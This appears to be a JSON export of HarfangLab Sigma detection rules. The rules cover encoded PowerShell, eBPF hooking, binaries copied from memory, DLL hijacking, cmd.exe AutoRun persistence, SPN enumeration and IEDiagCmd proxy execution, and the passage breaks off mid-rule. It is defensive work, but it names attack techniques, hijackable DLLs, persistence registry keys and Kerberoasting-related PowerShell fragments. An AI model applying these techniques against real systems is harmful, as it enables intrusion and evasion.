'?:\\Windows\\System32\\cmd.exe|?:\\Windows\\System32\\winrshost.exe|?:\\Windows\\System32\\svchost.exe|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n\n exclusion_quest:\n CommandLine|contains: ' -encodedCommand ZABvAHsADQAKAA0ACgAgACAAIAAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEADQAKACAAIAAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIAQQB0AHQAZQBuAHQAZQAiAA0ACgANAAoAfQB1AG4AdABpAGwAKAAoAEcAZQB0AC0AUwBlAHIAdgBpAGMAZQAgAC0AbgBhAG0AZQAgAGsAbwBuAGUAYQApAC4AUwB0AGEAdAB1AHMAIAAtAGUAcQAgACIAUgB1AG4AbgBpAG4AZwAiACkADQAKAA0ACgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgBSAHUAbgBuAGkAbgBnACIADQAKACQAYwBoAGUAbQBpAG4ASwBzAHQAYQB0AHUAcwAgAD0AIAAiACIADQAKAA0ACgBpAGYAKABUAGUAcwB0AC0AUABhAHQAaAAgACIAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwAgACgAeAA4ADYAKQBcAFEAdQBlAHMAdABcAEsAQQBDAEUAXABrAHMAdABhAHQAdQBzAC4AZQB4AGUAIgApAHsADQAKACAAIAAgACAA'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "506a49d4-0c48-4c47-a6bb-9c4dbfec663c",
"rule_name": "PowerShell Base64 Encoded Command Execution",
"rule_description": "Detects the execution of PowerShell launching a base64-encoded command.\nAttackers may encode their PowerShell command to bypass security tools that perform pattern matching on suspicious scripts.\nIt is recommended to check the encoded command for malicious content (for instance by selecting the base64 payload, right clicking and selecting 'Decode base64') and to analyze the execution context of the PowerShell binary.\n",
"rule_creation_date": "2021-04-13",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1027",
"attack.t1059.001",
"attack.t1132.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5079799a-2949-428b-a9e2-e8eef82f7be0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.296611Z",
"creation_date": "2026-03-23T11:45:35.296613Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.296618Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.synacktiv.com/publications/linkpro-analyse-dun-rootkit-ebpf",
"https://redcanary.com/blog/threat-detection/ebpf-malware/",
"https://github.com/pathtofile/bad-bpf",
"https://attack.mitre.org/techniques/T1014/"
],
"name": "t1014_ebpf_hooking.yml",
"content": "title: eBPF Hooking\nid: 5079799a-2949-428b-a9e2-e8eef82f7be0\ndescription: |\n Detects a function hooked via eBPF using either a KProbe or a Tracepoint.\n Malware can abuse kprobes by attaching eBPF programs to sensitive kernel functions so it can observe or alter their behavior whenever those functions are invoked.\n By using kretprobes, it can intercept the return values of system calls and subtly modify them, for example to hide files, processes, or network connections.\n Tracepoints give the malware a stable, predefined set of hook locations—such as syscall entry and exit—allowing it to monitor system activity without relying on fragile function offsets.\n These mechanisms allow malicious code to watch and manipulate system behavior from inside the kernel in a stealthy way.\n It is recommended to check the process which loaded the Extended BPF program and the fonction hooked for suspicious activities.\nreferences:\n - https://www.synacktiv.com/publications/linkpro-analyse-dun-rootkit-ebpf\n - https://redcanary.com/blog/threat-detection/ebpf-malware/\n - https://github.com/pathtofile/bad-bpf\n - https://attack.mitre.org/techniques/T1014/\ndate: 2025/08/11\nmodified: 2026/02/23\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1014\n - classification.Linux.Source.Bpf\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n product: linux\n category: bpf_event\ndetection:\n selection:\n Kind: 'ebpf_attach'\n Image: '*'\n\n filter_edr_av:\n - Image:\n - '/opt/microsoft/mdatp/sbin/wdavdaemon'\n - '/opt/hurukai-agent/bin/hurukai'\n - '/opt/f-secure/baseguard/services/sensor*'\n - '/o*/ds_agent/netagent/tm_netagent' # TrendMicro\n - '/opt/ds_agent/nuagent/ds_nuagent'\n - '/opt/TrendMicro/vls_agent/vls_am'\n - '/opt/ds_agent/ds_am'\n - '/opt/CrowdStrike/falcon-sensor-*'\n - '/var/ossec/bin/wazuh-syscheckd'\n - '/opt/sentinelone/bin/sentinelone-agent'\n - '/opt/sentinelone/ebpfs/test_ebpf'\n - '/opt/sentinelone/ebpfs/core/*'\n - '/usr/local/qualys/cloud-agent/mux/bpf/bin/qualys-bpf*'\n - '/usr/bin/falco'\n - '/opt/bitdefender-security-tools/bin/bdsecd'\n - 'memfd:/sophos-subprocess-*-exec?'\n - '/opt/sysmon/sysmon'\n - ProcessParentImage:\n - '/opt/sophos-spl/plugins/runtimedetections/bin/runtimedetections.0'\n - '/opt/fireeye/bin/rte-sensor'\n - ProcessCommandLine:\n - '/opt/hurukai-agent/bin/hurukai --diagnostic'\n - '/usr/bin/python3 /opt/paloaltonetworks/pab/linux_protector.py PrismaAccessBrowser'\n - Image: '/opt/hurukai/hurukai'\n ProcessParentImage: '/usr/lib/systemd/systemd'\n\n filter_firewall:\n Image:\n - '/usr/bin/opensnitchd'\n - '/opt/forticlient/webfilter'\n\n filter_monitoring:\n Image:\n - '/OPT/dynatrace*agent/agent/lib64/oneagentebpfdiscovery'\n - '*/dynatrace/agent/lib64/oneagentebpfdiscovery'\n - '/OPT/dynatrace*agent/agent/lib64/oneagentnettracer'\n - '*/usr/libexec/netdata/plugins.d/ebpf.plugin'\n - '/opt/datadog-agent/embedded/bin/system-probe'\n - '/opt/instana/agent/system/com/instana/ebpf*' # IBM\n - '/opt/stackstate-agent/bin/agent/process-agent'\n\n filter_bpfcc:\n ProcessCommandLine|startswith: '/usr/bin/python3 /usr/sbin/*-bpfcc'\n\n filter_bpftrace:\n Image: '/usr/bin/bpftrace'\n\n condition: selection and not 1 of filter_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5079799a-2949-428b-a9e2-e8eef82f7be0",
"rule_name": "eBPF Hooking",
"rule_description": "Detects a function hooked via eBPF using either a KProbe or a Tracepoint.\nMalware can abuse kprobes by attaching eBPF programs to sensitive kernel functions so it can observe or alter their behavior whenever those functions are invoked.\nBy using kretprobes, it can intercept the return values of system calls and subtly modify them, for example to hide files, processes, or network connections.\nTracepoints give the malware a stable, predefined set of hook locations—such as syscall entry and exit—allowing it to monitor system activity without relying on fragile function offsets.\nThese mechanisms allow malicious code to watch and manipulate system behavior from inside the kernel in a stealthy way.\nIt is recommended to check the process which loaded the Extended BPF program and the fonction hooked for suspicious activities.\n",
"rule_creation_date": "2025-08-11",
"rule_modified_date": "2026-02-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1014"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5090a218-eedf-49da-a5b1-15aa0497e12a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.611648Z",
"creation_date": "2026-03-23T11:45:34.611651Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.611659Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.aquasec.com/blog/perfctl-a-stealthy-malware-targeting-millions-of-linux-servers/",
"https://attack.mitre.org/techniques/T1070/010/"
],
"name": "t1070_010_binary_copied_from_memory.yml",
"content": "title: Binary Copied from Memory\nid: 5090a218-eedf-49da-a5b1-15aa0497e12a\ndescription: |\n Detects the copy of a running process binary from memory to a file.\n Attackers can copy a binary from memory after having deleted it to evade detection.\n It is recommended to investigate the binary that is copied to determine its legitimacy.\nreferences:\n - https://www.aquasec.com/blog/perfctl-a-stealthy-malware-targeting-millions-of-linux-servers/\n - https://attack.mitre.org/techniques/T1070/010/\ndate: 2024/10/09\nmodified: 2025/01/08\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.MemoryExecution\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n CommandLine|re: '^.*(cp|cat) /proc/[0-9]+/exe .*'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5090a218-eedf-49da-a5b1-15aa0497e12a",
"rule_name": "Binary Copied from Memory",
"rule_description": "Detects the copy of a running process binary from memory to a file.\nAttackers can copy a binary from memory after having deleted it to evade detection.\nIt is recommended to investigate the binary that is copied to determine its legitimacy.\n",
"rule_creation_date": "2024-10-09",
"rule_modified_date": "2025-01-08",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1036"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "50b47afd-ac3e-416b-8952-d95fdb3a39c5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087493Z",
"creation_date": "2026-03-23T11:45:34.087495Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087499Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://wietze.github.io/blog/save-the-environment-variables",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_camerasettings.yml",
"content": "title: DLL Hijacking via camerasettings.exe\nid: 50b47afd-ac3e-416b-8952-d95fdb3a39c5\ndescription: |\n Detects potential Windows DLL Hijacking via camerasettings.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'camerasettings.exe'\n ImageLoaded|endswith: '\\dui70.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "50b47afd-ac3e-416b-8952-d95fdb3a39c5",
"rule_name": "DLL Hijacking via camerasettings.exe",
"rule_description": "Detects potential Windows DLL Hijacking via camerasettings.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "50c34fde-abe0-424f-8a5b-4d6e76f40681",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627097Z",
"creation_date": "2026-03-23T11:45:34.627099Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627104Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1547/"
],
"name": "t1547_persistence_registry_cmd_autorun.yml",
"content": "title: Cmd.exe Autorun Set\nid: 50c34fde-abe0-424f-8a5b-4d6e76f40681\ndescription: |\n Detects when the cmd.exe AutoRun key is set in the registry.\n The command specified in the registry details is executed each time a cmd.exe process is run on the system.\n Attackers can register a malicious command to persist on the machine after compromising it.\n It is recommended to investigate the content of the registry value to look for malicious content.\nreferences:\n - https://attack.mitre.org/techniques/T1547/\ndate: 2020/09/28\nmodified: 2026/02/12\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1547\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject:\n - 'HKU\\\\*\\Software\\Microsoft\\Command Processor\\AutoRun'\n - 'HKU\\\\*\\Software\\Wow6432Node\\Microsoft\\Command Processor\\AutoRun'\n - 'HKLM\\Software\\Microsoft\\Command Processor\\AutoRun'\n - 'HKLM\\Software\\Wow6432Node\\Microsoft\\Command Processor\\AutoRun'\n filter_empty:\n Details: '(Empty)'\n\n exclusion_miniconda:\n # c:\\programdata\\miniconda3\\python.exe c:\\programdata\\miniconda3\\scripts\\conda-script.py init\n # c:\\users\\xxx\\miniconda3\\python.exe c:\\users\\xxx\\miniconda3\\scripts\\conda-script.py init\n # c:\\miniconda3\\python.exe c:\\miniconda3\\scripts\\conda-script.py init\n ProcessCommandLine|contains|all:\n - 'miniconda3\\python.exe'\n - 'miniconda3\\scripts\\conda-script.py init'\n exclusion_anaconda:\n # c:\\programdata\\anaconda3\\python.exe c:\\programdata\\anaconda3\\scripts\\conda-script.py init\n # c:\\users\\xxx\\anaconda3\\python.exe c:\\users\\xxx\\anaconda3\\scripts\\conda-script.py init\n ProcessCommandLine|contains|all:\n - '\\anaconda3\\python.exe'\n - '\\anaconda3\\scripts\\conda-script.py init'\n\n exclusion_various:\n Details|contains:\n - '\\condabin\\conda_hook.bat'\n - '\\condabin\\mamba_hook.bat'\n\n exclusion_image:\n ProcessImage:\n - '?:\\program files (x86)\\clink\\clink_x86.exe'\n - '?:\\$WINDOWS.~BT\\Sources\\SetupHost.exe'\n - '?:\\$WINDOWS.~BT\\Sources\\SetupPlatform.exe'\n - '?:\\$WINDOWS.~BT\\Sources\\WindowsUpdateBox.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "50c34fde-abe0-424f-8a5b-4d6e76f40681",
"rule_name": "Cmd.exe Autorun Set",
"rule_description": "Detects when the cmd.exe AutoRun key is set in the registry.\nThe command specified in the registry details is executed each time a cmd.exe process is run on the system.\nAttackers can register a malicious command to persist on the machine after compromising it.\nIt is recommended to investigate the content of the registry value to look for malicious content.\n",
"rule_creation_date": "2020-09-28",
"rule_modified_date": "2026-02-12",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1547"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "50d0aedb-3837-4993-b38c-dcd4b2e1cfd4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.096185Z",
"creation_date": "2026-03-23T11:45:34.096187Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.096191Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_appidpolicyconverter.yml",
"content": "title: DLL Hijacking via AppIDPolicyConverter.exe\nid: 50d0aedb-3837-4993-b38c-dcd4b2e1cfd4\ndescription: |\n Detects potential Windows DLL Hijacking via AppIDPolicyConverter.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'AppIDPolicyConverter.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\msvcp110_win.dll'\n - '\\srpapi.dll'\n - '\\userenv.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "50d0aedb-3837-4993-b38c-dcd4b2e1cfd4",
"rule_name": "DLL Hijacking via AppIDPolicyConverter.exe",
"rule_description": "Detects potential Windows DLL Hijacking via AppIDPolicyConverter.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "50e48bae-efce-45a3-847c-595812fe453c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095151Z",
"creation_date": "2026-03-23T11:45:34.095153Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095157Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731241(v=ws.11)",
"https://www.sentinelone.com/blog/detecting-a-rogue-domain-controller-dcshadow-attack/",
"https://attack.mitre.org/techniques/T1558/003/"
],
"name": "t1558_003_enumerate_spn_via_powershell.yml",
"content": "title: Suspicious SPNs Enumeration via PowerShell\nid: 50e48bae-efce-45a3-847c-595812fe453c\ndescription: |\n Detects the suspicious enumeration of Service Principal Names (SPNs) via PowerShell.\n SPNs are used to uniquely identify each instance of a Windows service.\n Attackers can extract the SPNs used in Active Directory to conduct attacks such as Kerberoasting.\n It is recommended to analyze the parent process as well as other commands executed in the same PowerShell to look for malicious content or actions.\nreferences:\n - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731241(v=ws.11)\n - https://www.sentinelone.com/blog/detecting-a-rogue-domain-controller-dcshadow-attack/\n - https://attack.mitre.org/techniques/T1558/003/\ndate: 2022/08/17\nmodified: 2025/01/31\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1558.003\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.Discovery\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection_1:\n # https://beta.hackndo.com/service-principal-name-spn/\n # https://www.saotn.org/list-spns-used-active-directory/\n PowershellCommand|contains|all:\n - 'DirectoryServices.DirectorySearcher'\n - '[ADSI]'\n - 'servicePrincipalName=\\*'\n - 'GetDirectoryEntry()'\n - '.servicePrincipalName'\n\n selection_2:\n # https://twitter.com/_wald0/status/1562871258190348289\n PowershellCommand|contains|all:\n - 'New-Object DirectoryServices.DirectorySearcher'\n - '(&(objectcategory=user)(servicePrincipalName=\\*))'\n - 'LDAP://'\n - 'FindAll()'\n\n selection_3:\n # https://github.com/nullbind/Powershellery/blob/master/Stable-ish/Get-SPN/Get-SPN.psm1\n PowershellCommand|contains|all:\n - '$ObjSearcher.SearchDN = New-Object System.DirectoryServices.DirectoryEntry('\n - 'LDAP://$($SearchDN)'\n - '$Records = $ObjSearcher.FindAll()'\n - '$_.properties.userprincipalname'\n - '# Get number of SPNs for accounts, parse them, and add them to the data table'\n - 'ServicePrincipalNames (SPN):'\n\n condition: 1 of selection_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "50e48bae-efce-45a3-847c-595812fe453c",
"rule_name": "Suspicious SPNs Enumeration via PowerShell",
"rule_description": "Detects the suspicious enumeration of Service Principal Names (SPNs) via PowerShell.\nSPNs are used to uniquely identify each instance of a Windows service.\nAttackers can extract the SPNs used in Active Directory to conduct attacks such as Kerberoasting.\nIt is recommended to analyze the parent process as well as other commands executed in the same PowerShell to look for malicious content or actions.\n",
"rule_creation_date": "2022-08-17",
"rule_modified_date": "2025-01-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1558.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "51195556-a3b2-47a1-b067-fefb536cee6d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088564Z",
"creation_date": "2026-03-23T11:45:34.088566Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088570Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Iediagcmd/",
"https://research.checkpoint.com/2025/stealth-falcon-zero-day/",
"https://attack.mitre.org/techniques/T1574/008/"
],
"name": "t1574_008_hijack_execution_flow_iediagcmd.yml",
"content": "title: Proxy Execution via IEDiagCmd.exe\nid: 51195556-a3b2-47a1-b067-fefb536cee6d\ndescription: |\n Detects the execution of a malicious binary launched through the legitimate IEDiagCmd.exe utility.\n IEDiagCmd.exe is a diagnostics utility for Internet Explorer that can be abused to proxy execution of arbitrary payloads.\n When the \"%WINDIR%\" environment variable is modified and IEDiagCmd.exe is executed with the /out parameter, it attempts to load netsh.exe from a modified path (e.g. \"C:\\test\\system32\\netsh.exe\").\n This behavior may indicate abuse of the IEDiagCmd LOLBin technique to execute attacker-controlled binaries through a trusted Windows process, bypassing security controls.\n It is recommended to verify if the windir environment variable was modified prior to execution, and to examine the binary being executed to determine if this activity was legitimate.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Iediagcmd/\n - https://research.checkpoint.com/2025/stealth-falcon-zero-day/\n - https://attack.mitre.org/techniques/T1574/008/\ndate: 2025/06/13\nmodified: 2025/06/20\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1574.008\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.IEDiagCmd\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ProcessParentOriginalFileName: 'IEDiagCmd.exe'\n Image|endswith:\n - 